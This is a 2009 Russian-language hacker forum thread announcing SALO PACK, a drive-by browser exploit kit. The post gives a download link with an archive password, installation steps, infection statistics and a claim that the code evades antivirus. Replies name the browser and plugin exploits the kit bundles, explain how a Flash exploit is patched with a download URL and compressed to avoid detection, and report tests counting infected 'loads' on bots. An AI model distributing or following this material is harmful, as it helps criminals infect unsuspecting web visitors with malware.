PDA

Просмотр полной версии : [SALO PACK] Alpha version

Dimi4
10.07.2009, 13:39
не актуально :)


http://uasc.org.ua/files/pig.png
SALO PACK © UASC (http://uasc.org.ua/)
by n0153r, Dimi4


Данный програмный продукт предназначен только для образовательных целей. Использование его в любом другом
виде может быть расценено как нарушение закона!
Запрещена продажа и использование исходного кода SALO PACK в коммерческих целях

Круто, да? :D

Мультисистемная связка эксплойтов со статистикой. (Написана с нуля)

Крипт кода эксплойтов по технологии разработанной UASC. (n0153r)
Использование технологии Sajax
Детальная статистика по странам, пробиву, браузерам, операционным системам.
Подсчет пробива без необходимости использования ПО заходящего на URL статистики.
Абсолютно ничего не палится АВ


На этот момент SALO PACK представляет собой набор из 6-х эксплойтов

Пример статистики:
http://i053.radikal.ru/0907/04/42b29b00dda4t.jpg (http://radikal.ru/F/i053.radikal.ru/0907/04/42b29b00dda4.jpg.html)
Или:
Кол-во посетителей 175
Кол-во зараженных 49
Общая пробиваемость 28%
ІЕ зараженных 97.96%
Установка

Отредактируйте файл cfg.php в соответствии с вашими данными.
В файле cfg.php строчку:
$config_adminPass=md5("xek");
Замените на
$config_adminPass=ВАШ_ПАРОЛЬ_В_МД5

Загрузите все файлы из архива на сервер.
Установите права 777 на файл cfg.php.
Запустите скрипт sql.php.
Зайдите в админ-центр (/admin/), перейдите в меню "Настройки", и загрузите свой файл.


Скриншуты

Вход в админку:
http://s45.radikal.ru/i110/0907/88/4d38cc90df3bt.jpg (http://radikal.ru/F/s45.radikal.ru/i110/0907/88/4d38cc90df3b.jpg.html)

Пробитые ИП:
http://s60.radikal.ru/i170/0907/9a/d9b0fe0cfa6ct.jpg (http://radikal.ru/F/s60.radikal.ru/i170/0907/9a/d9b0fe0cfa6c.jpg.html)

Настройки:
http://i023.radikal.ru/0907/d1/d38ad7bc93e8t.jpg (http://radikal.ru/F/i023.radikal.ru/0907/d1/d38ad7bc93e8.jpg.html)

Скачать: (Пароль - _roa_salopack)
http://uasc.org.ua/files/SALO_PACK_v_1.1.rar
P.S. Если у кого есть желание поделится сплойтами, и поддержать проект - велкам ПМ. Особенно нужен флеш сплойт.
2009 © UASC
ProTeuS
10.07.2009, 14:34
хек. держи +
а так, неплохо было бы в описание добавить что за эксплоиты используются
slider
10.07.2009, 15:42
Адепт .. а почему со сплойта идёт редирект на http://[xxx]/t/gate.php
Dimi4
10.07.2009, 15:50
Адепт .. а почему со сплойта идёт редирект на http://*/t/gate.php
Это для теста погрузилось тебе ПО. Ничего опасного нет, отстук просто на гейт.
Можете реверсить, проверять и тд.
Alexsize
10.07.2009, 16:11
8 ишак пробивает?
Dimi4
10.07.2009, 16:22
http://s56.radikal.ru/i154/0907/bc/1c5ad90f85dct.jpg (http://radikal.ru/F/s56.radikal.ru/i154/0907/bc/1c5ad90f85dc.jpg.html)
slesh
10.07.2009, 16:33
Сплоит под флеш - уже устарел (а более новых версия в руки не попадало както)
sboy20042
10.07.2009, 17:26
отпиши плиз какие сплойты юзаются

П.С. НАЗВАНИЕ ТРУ)))
nc.STRIEM
10.07.2009, 17:39
mysql_query("drop database $config_dbName;");
mysql_query("create database $config_dbName;");

вотэто лучше убрать... или хотябы предуприждение написать

А как определяеься заражон комп или нет?
заходил через ие7 в стате пишеться что заражен, хотя на самом деле файл небыл запущен
eLWAux
10.07.2009, 21:29
GET /SALO_PACK/i.php HTTP/1.1
Host: localhost
<br />
<b>Notice</b>: Undefined index: HTTP_USER_AGENT in <b>pew\pew\pew\SALO_PACK\f.php</b> on line <b>6</b><br />
<br />f.php:$nua = strToLower(@$_SERVER['HTTP_USER_AGENT']);
и везде подобавлять error_reporting(0);
Dimi4
10.07.2009, 21:38
Народ, сегодня уезжаю, поэтому может не успею ответить на все вопросы.

2 nc.STRIEM Поправим.

Определение пробива происходит следующим образом: код сплойта исполняется, в конце отправляется результат с помощью Sajax

Все указанные погрешности постараюсь исправить как только будет возможность
Dimi4
10.07.2009, 21:54
На счет списка сплойтов:
Дело в том, что связка начала писатся около полгода назад, и названия сплойтов надо просто вспоминать, ведь щас они криптованые.
Под Оперу:
IE7 Sploit (DirectShow)
Opera 9.62 [exploit] - https://forum.antichat.ru/printthread.php?t=57602&pp=40 полностю переделаный от n0153r
Осел
1 - http://unitedcrew.org/viewtopic.php?p=55556
2 - http://eriz.pcinside.pl/weblog/gadu-padu-trojanik-64.html
3 - https://forum.antichat.ru/printthread.php?t=43038&pp=40

также прошу не забывать от том что совместным автором является n0153r (https://forum.antichat.ru/member.php?u=37866)
slesh
11.07.2009, 01:01
Вот Flash сплоит. Вроде как под 12 версий флеша.
Когда то писал для своей связки.
Алгоритм работы такой:
Грузится файл flash.dat - неупакованная флешка - сигнатура FWS
Затем в неё вбивается адрес для скачевания файла.
И Потом пакуется всё это гзипом и добавляются заголовки для получения упакованной флешки (сигнатура CWS) - для беспаливности )
n0153r
12.07.2009, 14:18
Вот Flash сплоит. Вроде как под 12 версий флеша.
Когда то писал для своей связки.
Алгоритм работы такой:
Грузится файл flash.dat - неупакованная флешка - сигнатура FWS
Затем в неё вбивается адрес для скачевания файла.
И Потом пакуется всё это гзипом и добавляются заголовки для получения упакованной флешки (сигнатура CWS) - для беспаливности )
Спасибо =) Сейчас розберусь и добавлю все.
Жди в скором времени апдейт ...
sboy20042
14.07.2009, 15:09
вообщем тестил я связку на 2 ботах, в обоих случаях ничего не остучало, 1 бота слили 100 лоадов по стате в 40% пробива) второго 20 лоадов и ничего не отстукало)
Twoster
14.07.2009, 17:17
у меня ни ИЕ7 ни Лису 2, ни оперу не пробило, хотя писало что пробив был.
Кстати ИЕ любезно предложил запустить сплойт, я эту инициативу одобрил, однако он в ответ завис, так и не запустив мою заветную программулину. =(
n0153r
15.08.2009, 19:37
Ну наконец дошли руки обновить связку.
Посидели с Димкой и наколдовали обновления.
Добавили сплоит под ПДФ и под ФФ 3.5
Все что собрали до отпуска :)
Может у кого нить есть что-то интересное - предлагайте.

А вот и линк : http://uasc.org.ua/files/SALO_PACK_v_1.1.rar

Жду критику :)
P/S думаю до версии 2.0 все будет работать как часики .
Делали с душой для все РОА.
Спасибо за внимание.
1ten0.0net1
16.08.2009, 00:27
404 по линку
Dimi4
16.08.2009, 00:33
http://uasc.org.ua/files/SALO_PACK_v_1.1.rar
madnet
25.08.2009, 03:21
Аналогинчно как и у sboy20042 и Twoster система отписала 100 загрузок, а в реале ничего не прогрузилось
.::Gh0st::.
08.09.2009, 14:23
ff-3.5.php спалился нодом при распаковке, мне кажется в работе смысла тестить нету
Neoveneficus
03.10.2009, 14:39
ff-3.5.php спалился нодом при распаковке, насколько мне кажется в работе смысла тестить нету
это все фигня - это же php файл... у меня на r57shell тоже антивирь когда-то ругался (когда винда была). Когда заходишь на страничку с шеллом - он ведь ничего не орет
1ten0.0net1
03.10.2009, 21:00
это все фигня - это же php файл... у меня на r57shell тоже антивирь когда-то ругался (когда винда была). Когда заходишь на страничку с шеллом - он ведь ничего не орет

Ну как не орет.
On-demand access сканер, конечно, проверяет файл кеша - как следствие - лично у меня, орёт.
sboy20042
03.10.2009, 21:06
не вижу смысла вообще в обсуждении потому как кроме дизайна в свяке ничего не пашет
Neoveneficus
04.10.2009, 19:17
будем надеяться, что у авторов хватит времени и энтузиазма поправить все =)
Alexsize
05.10.2009, 02:36
Что там править, если спалены механизмы эксплуатации?
Neoveneficus
05.10.2009, 02:58
Что там править, если спалены механизмы эксплуатации?
моя твоя не понимать... объясни, пожалуйста, тупому?
Alexsize
05.10.2009, 13:43
Все баги что там есть уже:
1) палятся антивирусами, как шеллкод не меняй.
2) не работают, потому что все уже залатно.